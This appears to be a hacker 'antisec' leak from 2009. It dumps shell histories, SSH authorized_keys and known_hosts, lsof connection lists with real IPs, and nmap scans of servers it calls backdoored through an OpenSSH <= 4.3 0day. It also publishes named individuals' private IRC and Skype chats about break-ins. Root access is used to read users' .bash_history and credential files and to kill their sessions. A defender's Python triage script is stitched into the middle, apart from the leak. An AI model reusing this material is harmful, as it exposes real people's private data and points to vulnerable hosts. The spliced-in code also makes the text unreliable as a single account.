tail -f messages
cat security | grep romeo
cat security | grep root
w
cd ~romeo
ls -la
cat  .bash_history
ps aux | grep romeo
ps aux | grep romeo
ps aux | grep ssh
w
ls -la
w
ls -la
ps aux
ps aux | grep irc
ping velocity.vitalspeeds.com
[root@velocity:~]# 

/* 
RoMe0 in panic mode.. netstat.. netstat.. netstat.. 
Thank you for all the fish.. n00bfish..
*/

[root@velocity:~]# cat /usr/home/pimpinjg/.bshrc 
nano .bashrc
clear
ls
grep -r motd
grep -r motd *
clear
rm -rf znc*
clear
ls
clear
PS1='\033[1;32m\]\033[1;30m\][\033[1;32m\]root\[\033[1;30m\]@\[\033[1;32m\]\h\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] '
clear
uptime
ps aux
ls -al
uptime
clear
ls
nano .profile
nano .bashprompt
exit
clear
screen -r
clear
exit
clear
screen -r
screen -r
clear
exit
[root@velocity:~]# 

// Advanced Linux Administration Skillz.. The 2 years of extensive training finally paid off.. 


[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/known_hosts

[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAn6d6bVIeir4IWs3b8F8kUfiaHKXZ+4nwuQpRMaoI67rqY8Tmjp5oFgT7CeRCIF0GUXAjY3my4T3GcV0ed+/5ilyoC0NG5W/TAvF62IQpQop9apP8HBlyiOaHuXgNVbit6/1EUW4SvLWdUe8zNqTWPw0/qZ2eQAEH8E+cbqT8LYsNWsQI9tpcJykigRZF1TqjL6vJtbQLqSgr2Gdz1+Xv9wXKlxdHSLa5ay5VuEij6w6rUS7ZI9OoOqGA2NICjs008cOy3yhCVHh1V7I50rLoPZWBZa72VBPPMvqiJpHbcIP8+NaXnIeLoINnYsV3xk27lSDT0UBBHLQ5miaLnvEzgw== pimpinjg@mercedes.pimpinjg.ch


[root@velocity:/var/run]# lsof -i -n | grep ssh
sshd      19971       root    3u  IPv6 0xcc1771d0      0t0  TCP *:ssh (LISTEN)
sshd      19971       root    4u  IPv4 0xc585e000      0t0  TCP *:ssh (LISTEN)

sshd      23362       root    3u  IPv4 0xca6ae570      0t0  TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED) 
sshd      23383      romeo    3u  IPv4 0xca6ae570      0t0  TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED) 

sshd      28333       root    3u  IPv4 0xc9fc4570      0t0  TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
sshd      28335     yaquis    3u  IPv4 0xc9fc4570      0t0  TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
sshd      30593       root    3u  IPv4 0xc97b93a0      0t0  TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
sshd      30595     katsst    3u  IPv4 0xc97b93a0      0t0  TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
sshd      30595     katsst   10u  IPv4 0xc5b901d0      0t0  TCP 72.20.3.98:63271->192.168.1.1:http (SYN_SENT)
sshd      30595     katsst   11u  IPv4 0xc590eae0      0t0  TCP 72.20.3.98:60359->91.184.73.195:46464 (ESTABLISHED)
sshd      30595     katsst   12u  IPv4 0xc94fc570      0t0  TCP 72.20.3.98:61645->79.66.132.125:44020 (ESTABLISHED)
sshd      30595     katsst   13u  IPv4 0xc5eb2910      0t0  TCP 72.20.3.98:62162->192.168.1.1:http (SYN_SENT)
sshd      30595     katsst   14u  IPv4 0xc996d000      0t0  TCP 127.0.0.1:58269->127.0.0.1:33282 (SYN_SENT)
sshd      30595     katsst   15u  IPv4 0xc954e910      0t0  TCP 72.20.3.98:60168->72.185.123.4:6601 (ESTABLISHED)
sshd      30595     katsst   17u  IPv4 0xc99f81d0      0t0  TCP 72.20.3.98:60170->66.245.139.243:53066 (ESTABLISHED)
sshd      30595     katsst   18u  IPv4 0xca0c1570      0t0  TCP 72.20.3.98:60172->124.168.34.236:50666 (ESTABLISHED)
sshd      30595     katsst   19u  IPv4 0xcaf02910      0t0  TCP 72.20.3.98:60173->130.212.54.5:28573 (ESTABLISHED)
sshd      30595     katsst   22u  IPv4 0xc9dd9740      0t0  TCP 72.20.3.98:60180->173.22.219.92:64415 (ESTABLISHED)
sshd      30595     katsst   23u  IPv4 0xc622c570      0t0  TCP 72.20.3.98:60178->173.54.28.183:22677 (ESTABLISHED)
sshd      30595     katsst   27u  IPv4 0xca10bcb0      0t0  TCP 72.20.3.98:60183->79.101.217.199:55824 (ESTABLISHED)
sshd      30595     katsst   28u  IPv4 0xcc5021d0      0t0  TCP 72.20.3.98:60188->92.72.182.81:50009 (ESTABLISHED)
sshd      30595     katsst   29u  IPv4 0xcc3dd740      0t0  TCP 72.20.3.98:60189->65.26.34.13:23928 (ESTABLISHED)
sshd      30595     katsst   30u  IPv4 0xc972b740      0t0  TCP 72.20.3.98:60190->87.80.43.167:49878 (ESTABLISHED)
sshd      30595     katsst   35u  IPv4 0xca1413a0      0t0  TCP 72.20.3.98:60195->61.229.122.218:42282 (ESTABLISHED)
sshd      30595     katsst   38u  IPv4 0xc61be910      0t0  TCP 72.20.3.98:60198->67.185.180.151:21366 (ESTABLISHED)
sshd      30595     katsst   42u  IPv4 0xca1cb1d0      0t0  TCP 72.20.3.98:60202->81.246.198.243:21771 (ESTABLISHED)
sshd      30595     katsst   43u  IPv4 0xc9db61d0      0t0  TCP 72.20.3.98:60203->71.228.40.165:13289 (ESTABLISHED)
sshd      30595     katsst   46u  IPv4 0xc61bd3a0      0t0  TCP 72.20.3.98:60217->70.69.35.95:48486 (ESTABLISHED)
sshd      30595     katsst   49u  IPv4 0xc92c6000      0t0  TCP 72.20.3.98:60224->24.245.45.179:56678 (ESTABLISHED)
sshd      30595     katsst   52u  IPv4 0xcae45740      0t0  TCP 72.20.3.98:60229->66.41.52.92:26396 (ESTABLISHED)
sshd      30595     katsst   56u  IPv4 0xca03d740      0t0  TCP 72.20.3.98:60258->122.167.178.174:29404 (ESTABLISHED)
sshd      30595     katsst   82u  IPv4 0xc9dbacb0      0t0  TCP 72.20.3.98:60295->77.250.210.43:62003 (ESTABLISHED)
sshd      30595     katsst   85u  IPv4 0xca0793a0      0t0  TCP 72.20.3.98:60311->93.97.7.183:38461 (ESTABLISHED)
sshd      30595     katsst   86u  IPv4 0xc9a1c000      0t0  TCP 72.20.3.98:60307->65.33.173.202:24132 (ESTABLISHED)
sshd      30595     katsst   87u  IPv4 0xc986f910      0t0  TCP 72.20.3.98:60312->74.173.228.216:61577 (ESTABLISHED)
sshd      30622       root    3u  IPv4 0xc98fb000      0t0  TCP 72.20.28.205:ssh->89.30.147.8:3766 (ESTABLISHED)
sshd      30890       root    3u  IPv4 0xc58eb000      0t0  TCP 72.20.28.205:ssh->89.30.147.8:3812 (ESTABLISHED)
[root@velocity:/var/run]# 

ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ	[root@velocity:/]# ps -aux | grep romeo									      ANTISECFORLULZ
ANTISECFORLULZ	root       98610  0.0  0.2  5400  2004  ??  Is   12:16PM   0:00.19 sshd: romeo [priv] (sshd)		      ANTISECFORLULZ
ANTISECFORLULZ	romeo      98648  0.0  0.2  5384  2052  ??  S    12:16PM   0:03.21 sshd:  (sshd)			      ANTISECFORLULZ
ANTISECFORLULZ	romeo      27874  0.0  0.6  9104  6212  p0  S+    2:21PM   0:04.59 irssi -h absolute.ownage.net		      ANTISECFORLULZ
ANTISECFORLULZ	romeo      32521  0.0  0.1  3272  1384  p0  Is    7:40PM   0:00.05 /usr/local/bin/bash                        ANTISECFORLULZ
ANTISECFORLULZ	romeo      27845  0.0  0.1  2040  1376  p2  S+    2:20PM   0:00.04 screen -r				      ANTISECFORLULZ
ANTISECFORLULZ	romeo      98652  0.0  0.2  3244  1848  p2  Is   12:16PM   0:00.03 -bash (bash)				      ANTISECFORLULZ
ANTISECFORLULZ	root       32868  0.0  0.1  1552   872  p3  L+    4:23PM   0:00.00 grep romeo				      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ	[root@velocity:/]# killall screen									      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ	[00:25:59] * Quits: @pimpinjg (FBI@tdirc-1243C38A.deploy.akamaitechnologies.com) (Quit: Lost terminal)	      ANTISECFORLULZ
ANTISECFORLULZ	[00:25:59] * Quits: &RoMeO (root@DarkMindZ.com) (Quit: Lost terminal)					      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ	[12:29am] <~RoMeO> wtf is up with screen :@ 								      ANTISECFORLULZ
ANTISECFORLULZ	[12:29am] <+G-Brain> 23:26 -!- RoMeO [root@DarkMindZ.com] has quit [Quit: Lost terminal]		      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <~RoMeO> "[screen is terminating]" with no reason						      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <+G-Brain> hah										      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <%p3ri0d> oh yeah										      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <+G-Brain> it has a few shitty default key bindings						      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <~RoMeO> ctrl+D										      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <~RoMeO> didnt do that									      ANTISECFORLULZ
ANTISECFORLULZ	[12:33am] <~RoMeO> gay shit										      ANTISECFORLULZ
ANTISECFORLULZ	[12:33am] <+G-Brain> [romeo@juliet]$ pkill -9 screen							      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ

[root@velocity:/]# last | grep romeo
romeo            ttyp3    188.50.84.224    Thu Jul  2 23:06 - 00:24  (01:17)
romeo            ttyp0    188.50.84.224    Thu Jul  2 22:53 - 01:52  (02:58)
romeo            ttyp6    188.51.85.13     Thu Jul  2 14:49 - 17:59  (03:09)
romeo            ttyp5    188.51.85.13     Thu Jul  2 12:12   still logged in
romeo            ttyp5    188.51.85.13     Thu Jul  2 11:02 - 11:05  (00:02)
romeo            ttyp5    188.51.85.13     Wed Jul  1 20:29 - 20:29  (00:00)

[root@velocity:/]# cat ~/ssh/known_hosts 
89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
quad1.ircvps.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==

// Backdoored Servers (Makosolutions, Efnet, IRCVPS, etc..) all running OpenSSH <= 4.3

NMap Scans of all servers compromised
-------------------------------------

1. nmap -v -sV -P0 webhostline.com -p 2222

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.09s elapsed
Initiating SYN Stealth Scan at 11:28
Scanning 6696220213.hostnoc.net (66.96.220.213) [1 port]
Discovered open port 2222/tcp on 66.96.220.213
Completed SYN Stealth Scan at 11:28, 0.77s elapsed (1 total ports)
Initiating Service scan at 11:28
Scanning 1 service on 6696220213.hostnoc.net (66.96.220.213)
Completed Service scan at 11:28, 0.57s elapsed (1 service on 1 host)
NSE: Script scanning 66.96.220.213.
NSE: Script Scanning completed.
Host 6696220213.hostnoc.net (66.96.220.213) is up (0.24s latency).
Interesting ports on 6696220213.hostnoc.net (66.96.220.213):
PORT     STATE SERVICE VERSION
2222/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
           Raw packets sent: 1 (44B) | Rcvd: 48 (4086B)


2. nmap -v -sV -P0 -p 22 vitalspeeds.com

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.02s elapsed
Initiating SYN Stealth Scan at 11:28
Scanning ukscene.diyhost.co.uk (66.197.170.181) [1 port]
Discovered open port 22/tcp on 66.197.170.181
Completed SYN Stealth Scan at 11:28, 0.82s elapsed (1 total ports)
Initiating Service scan at 11:28
Scanning 1 service on ukscene.diyhost.co.uk (66.197.170.181)
Completed Service scan at 11:28, 0.52s elapsed (1 service on 1 host)
NSE: Script scanning 66.197.170.181.
NSE: Script Scanning completed.
Host ukscene.diyhost.co.uk (66.197.170.181) is up (0.25s latency).
Interesting ports on ukscene.diyhost.co.uk (66.197.170.181):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)

3. nmap -v -sV -P0 -p 22 stardustdawn.com

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.69s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning mx101.stardustdawn.com (64.191.69.101) [1 port]
Discovered open port 22/tcp on 64.191.69.101
Completed SYN Stealth Scan at 11:29, 0.80s elapsed (1 total ports)
Initiating Service scan at 11:29
Scanning 1 service on mx101.stardustdawn.com (64.191.69.101)
Completed Service scan at 11:29, 0.60s elapsed (1 service on 1 host)
NSE: Script scanning 64.191.69.101.
NSE: Script Scanning completed.
Host mx101.stardustdawn.com (64.191.69.101) is up (0.24s latency).
Interesting ports on mx101.stardustdawn.com (64.191.69.101):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)


4. nmap -v -sV -P0 -p 2022 irc.indoirc.net

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Warning: Hostname irc.indoirc.net resolves to 2 IPs. Using 70.34.192.50.
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning ip-70-34-192-50.razorservers.com (70.34.192.50) [1 port]
Discovered open port 2022/tcp on 70.34.192.50
Completed SYN Stealth Scan at 11:29, 0.82s elapsed (1 total ports)
Initiating Service scan at 11:29
Scanning 1 service on ip-70-34-192-50.razorservers.com (70.34.192.50)
Completed Service scan at 11:29, 0.55s elapsed (1 service on 1 host)
NSE: Script scanning 70.34.192.50.
NSE: Script Scanning completed.
Host ip-70-34-192-50.razorservers.com (70.34.192.50) is up (0.26s latency).
Interesting ports on ip-70-34-192-50.razorservers.com (70.34.192.50):
PORT     STATE SERVICE VERSION
2022/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)

5. nmap -v -sV -P0 -p 22 absolute.ownage.net

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 12:23 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 12:23
Completed Parallel DNS resolution of 1 host. at 12:23, 0.51s elapsed
Initiating SYN Stealth Scan at 12:23
Scanning absolute.ownage.net (72.20.28.205) [1 port]
Discovered open port 22/tcp on 72.20.28.205
Completed SYN Stealth Scan at 12:23, 0.88s elapsed (1 total ports)
Initiating Service scan at 12:23
Scanning 1 service on absolute.ownage.net (72.20.28.205)
Completed Service scan at 12:23, 0.64s elapsed (1 service on 1 host)
NSE: Script scanning 72.20.28.205.
NSE: Script Scanning completed.
Host absolute.ownage.net (72.20.28.205) is up (0.31s latency).
Interesting ports on absolute.ownage.net (72.20.28.205):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 1.99)

Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
// OpenSSH upgraded to 5.2 

6. nmap -sV -p 22 ircvps.com

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-19 13:37 GTB Standard Time
Interesting ports on s69-163-34-138.in-addr.arpa.static.dsn1.net (69.163.34.138):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds


7. anti-sec:~/pwn# ./map ssanz.net

IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3

IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3


8. Astalavista

[7/4/2009 3:39:52 PM] Glafkos Charalambous: the exploit is openssh v4.3 and below
[7/4/2009 3:40:17 PM] Glafkos Charalambous: what OS was asta running ?
[7/4/2009 3:40:28 PM] Pascal Mittner: CentOS
[7/4/2009 3:40:53 PM] Glafkos Charalambous: centos 5.3 latest version comes with openssh 4.3p2
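
The scan results above share one element, the OpenSSH version, and one of them also reports protocol 1.99. The following is an added example, not part of the original text: a defender's triage of saved scan and banner output in the two formats shown above, flagging services at or below the 4.3 threshold named on this page and services that still accept SSH-1. The sample hosts are constructed placeholders and the names `triage`, `needs_review` and `Finding` are hypothetical.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample in the two output formats this page shows (nmap -sV
# service lines and raw SSH identification strings). Hosts and addresses are
# documentation placeholders, not the page's hosts.
SAMPLE = """\
Interesting ports on host-a.example (192.0.2.10):
PORT     STATE SERVICE VERSION
2222/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
Interesting ports on host-b.example (192.0.2.11):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 1.99)
Interesting ports on host-c.example (192.0.2.12):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.2 (protocol 2.0)
IP: 192.0.2.13 ( host-d.example )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 192.0.2.14 ( host-e.example )
SSH: SSH-2.0-OpenSSH_4.3p2
"""

# Host header lines: nmap 4.x/5.00 style and the "IP: addr ( name )" style.
HOST_NMAP = re.compile(r"^Interesting ports on (?P<name>\S+) \((?P<ip>[\d.]+)\)")
HOST_MAP = re.compile(r"^IP:\s*(?P<ip>[\d.]+)\s*\(\s*(?P<name>\S+)\s*\)")
# nmap -sV service line, e.g. "22/tcp open  ssh  OpenSSH 4.3 (protocol 2.0)".
SVC_NMAP = re.compile(
    r"^(?P<port>\d+)/tcp\s+open\s+ssh\s+OpenSSH "
    r"(?P<major>\d+)\.(?P<minor>\d+)(?P<rest>[\w.]*).*?protocol (?P<proto>\d+\.\d+)"
)
# Raw identification string (RFC 4253, section 4.2): SSH-<proto>-<software>.
BANNER = re.compile(
    r"SSH-(?P<proto>\d+\.\d+)-OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)(?P<rest>[\w.]*)"
)


class Finding(NamedTuple):
    host: str
    port: Optional[int]   # None when only a banner was captured
    version: str          # upstream version string as advertised
    protocol: str
    old_version: bool     # advertised (major, minor) <= threshold
    ssh1_enabled: bool    # "1.99" means the server also accepts SSH-1


def triage(text: str, threshold: Tuple[int, int] = (4, 3)) -> List[Finding]:
    """Return one Finding per OpenSSH service seen in scan or banner text."""
    findings: List[Finding] = []
    host = "unknown"
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_NMAP.match(line) or HOST_MAP.match(line)
        if m:
            host = m.group("name")
            continue
        m = SVC_NMAP.match(line)
        port: Optional[int] = int(m.group("port")) if m else None
        m = m or BANNER.search(line)
        if not m:
            continue
        major, minor = int(m.group("major")), int(m.group("minor"))
        proto = m.group("proto")
        findings.append(Finding(
            host=host,
            port=port,
            version=f"{major}.{minor}{m.group('rest')}",
            protocol=proto,
            # Threshold is the page's claim (<= 4.3), passed in as an assumption.
            old_version=(major, minor) <= threshold,
            # RFC 4253 section 5.1: a server supporting both 1.x and 2.0
            # announces protocol version 1.99.
            ssh1_enabled=proto.startswith("1."),
        ))
    return findings


def needs_review(findings: List[Finding]) -> List[Finding]:
    """Services to check by hand: old advertised version or SSH-1 accepted."""
    return [f for f in findings if f.old_version or f.ssh1_enabled]


if __name__ == "__main__":
    for f in needs_review(triage(SAMPLE)):
        reasons = []
        if f.old_version:
            reasons.append("OpenSSH <= 4.3")
        if f.ssh1_enabled:
            reasons.append("SSH-1 accepted")
        print(f"{f.host} port={f.port} {f.version}: {', '.join(reasons)}")
```

The banner carries only the upstream version number; distributions such as CentOS backport fixes without changing it, so a hit here is a prompt to check the installed package and its changelog, not proof of exposure.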



ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
ANTISECFORLULZ				  ANTISECFORLULZ
ANTISECFORLULZ 	    Private Chat Logs     ANTISECFORLULZ
ANTISECFORLULZ				  ANTISECFORLULZ
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ


--- Log opened Wed Jun 17 09:05:41 2009
09:05 [Glyph(Glyph@mods.govsec.org)] might want to be more selective.. your 0day is starting to become apparent with each g0troot
09:06 -pand!- Irssi: Starting query in bhf with Glyph
09:07 (RoMeO) wat
09:07 (Glyph) Need to be more 'selective' 
09:07 (Glyph) two of two ... tsk, tsk, tsk..
09:07 (RoMeO) you need to explain more, and why do you think i wrote 'g0troot' or ever used it 
09:07 (Glyph) If you keep up with that, everyone is gonna now where to look.
09:08 (RoMeO) and where did you see me use it? lol 
// Everywhere..

09:08 (Glyph) Doesn't what distro, when there's another 'common element' 
// OpenSSH <= 4.3

09:08 (Glyph) Just saying need to be more circumspect.
09:08 (Glyph) Not saying 'you'..
09:09 (RoMeO) okay :]
09:09 (Glyph) But I know you'll get w1rd to those responsible.
09:09 (Glyph) Capice?
09:09 (RoMeO) will do
09:09 (Glyph) If the 'perps' keep it up, it won't be a 0day now will it?
09:10 (RoMeO) ofcourse, but again... i am pretty sure you dont know where to look and if you look hard you will see 'g0troot' only used once in public
09:10 (RoMeO) so i dont know what do you mean by 'need to stop using it' sicne it was only used once from what i read
09:11 (Glyph) Rightio.
09:11 (Glyph) two out of two 
09:11 (Glyph) Both had a common element.
09:11 (RoMeO) which is
09:11 (Glyph) Besides being shitty about 'security'
09:11 (Glyph) For pay type product.
09:12 (RoMeO) yeah
09:12 (RoMeO) the targetted people are publicized
09:12 (RoMeO) they are the people that say they are security experts while they dont really qualify to be your average noob
09:12 (RoMeO) the people who publish exploits
09:13 (RoMeO) people who make money out of free stuff, related to 'security' etc
09:13 (Glyph) lol.. not yesterday's demo ;)
09:13 (RoMeO) yesterday was just to prove something to dark
09:13 (RoMeO) he didnt say a word after that
09:13 (Glyph) Aye.. but .....
09:13 (Glyph) tipped the scales in my favour.
09:14 (Glyph) The more it gets done, the more likely it is the 0day is exposed.
09:14 (RoMeO) ofcourse
09:14 (Glyph) Now.. that does NOT mean that all that have the product haven't alreay been 'had'
09:14 (Glyph) But it does lead to disclosure.
09:15 (Glyph) 'Even a blind pig finds an acorn every now and then'
09:15 (RoMeO) sure, i understand
09:15 (Glyph) And InfoSec isn't st00pid like Dark seems to think. 
// Really ?

09:15 (RoMeO) i never underestimate anyone
09:15 (RoMeO) thats my rule 

09:16 (Glyph) If I can already see 'glimpses', you can bet others out there can as well.
09:17 (RoMeO) let them see it, antisec got more tricks up the sleeves ;p
09:17  -> Glyph chuckles
09:17 (Glyph) I'm well aware of that.
09:17 (Glyph) But don't ya just hate losing 'weaponized' shit for a lark?
09:18 (Glyph) Put that arrow back in yer quiver.. might be really useful sometime down the road.
09:18 (RoMeO) yeah, i understand you, and again it was just to prove something to someone... nothing was left behind, those 'acts' rarely ever happen
09:19 (Glyph) Thing is.. WTF did you need to prove any damn thing to Dark?
09:19 (Glyph) Scratch that.. change pronouns to third person ;)
09:19 (RoMeO) its between me and him ;p
09:19 (RoMeO) he talks alot
09:21 (Glyph) You know I log the publics?
09:21 (RoMeO) i assume alot do

09:22 (RoMeO) i just hope you dont log privates

09:37 (RoMeO) so your job is basically... ?
09:40 (Glyph) Coordinator, IT Research and Special Projects.. in a 2 year college
09:40 (RoMeO) nice, well i will bbl
09:41 (Glyph) Ciao.. and yes that's enough info to figure out who I am.
09:41 (RoMeO) haha
--- Log closed Wed Jun 17 09:46:34 2009

--- Log opened Wed Jun 17 14:21:36 2009
14:21 (Glyph) Aye.
14:22 (Glyph) Don't take the stuff I spin in channel to heart.
14:22 (RoMeO) :)
14:22 (Glyph) I'm interested in debating with Dark.
14:22 (RoMeO) yeah i saw
14:22 (Glyph) Plus it may actually spark some interest in the subject.
14:22 (RoMeO) but again, all he does is talk
14:22 (RoMeO) so what i did when i first met him was
14:22 (RoMeO) to shut him up
14:23 (RoMeO) i put him up on a challenge
14:23 (Glyph) It's a topic that every individual needs to make a decision about.
14:23 (RoMeO) we made some random guy on irc to post a random security site
14:23 (RoMeO) and the challenge was who gets access to it first
14:23 (RoMeO) i got in
14:23 (RoMeO) he didnt
14:23 (RoMeO) but he kept on arguing
14:23 (RoMeO) about how he got vulns on it, but its 'way over my league' rofl
14:24 (Glyph) You know what that sounds like to me?
14:24 (RoMeO) what
14:24 (Glyph) 'tempest in a teacup'
14:24 (RoMeO) lol
14:24 (Glyph) Notice he braced me in channel..
14:24 (Glyph) right.
14:24 (RoMeO) right
14:24 (Glyph) 'When did you stop beating your wife sir?'
14:25 (RoMeO) lol.
14:25 (Glyph) HE should be presuming that everyone has 'skillz' and can whoop his arse.
14:25 (RoMeO) he is all about talk, and its not like he just started this, no no, apparently he been around since 2000 and doing the -same- ever since
14:26 (Glyph) hmmm... I've been around a lot longer than that.
14:26 (RoMeO) yea, just saying its not like he does that here only or just now
14:26 (Glyph) Course I can plead ignorance.. not aware of a lot
14:26 (Glyph) Leopard isn't likely to change its spots
14:27 (RoMeO) haha
14:28 (RoMeO) webdevil knows alot about him too, he was there when he got kicked in his lil challenge
14:28 (RoMeO) and he didnt come back to the channel for a long long time after that
14:29 (Glyph) I presume you have an account at gso
14:29 (RoMeO) i dont know honestly
14:29 (RoMeO) but if ther was, it would be RoMeO
--- Log closed Wed Jun 17 14:34:34 2009


--- Log opened Thu Jun 18 17:35:20 2009
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Wheres newtype hang these days?
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Its been so long since I've talked with her
17:35 -pand!- Irssi: Starting query in bhf with Dark
17:36 (RoMeO) we just met on rizon
17:36 (RoMeO) for a small chat
17:36 (Dark) Word
17:36 (Dark) Can I safely assume she's all up in -antisec?
17:36 (Dark) In lieu of recent Astalavista incident?
17:38 (Dark) Well
17:38 (Dark) If you see her around again
17:38 (Dark) Tell her Dark says hi
17:38 (Dark) And thanks for everything
17:38 (RoMeO) what do yoou mean -antisec
17:38 (RoMeO) and willl do
17:39 (Dark) I mean
17:39 (Dark) She's probably restarting her actions
17:39 (Dark) In zfo and whatnot
17:39 (Dark) Just an assumption
17:39 (RoMeO) i dont know really, but she really liked the latest antisec movement
17:39 (RoMeO) actions etc
17:39 (Dark) Good to hear
17:39 (RoMeO) ^^
17:40 (Dark) Along time ago she said she had a ICMP exploit for IOS
17:40 (Dark) I may attempt to locate her and coax it out of her
17:40 (Dark) Seeing as she's probably not using it anymore
17:40 (RoMeO) yea, she is out of all this for now
17:40 (RoMeO) too busy and whatnot
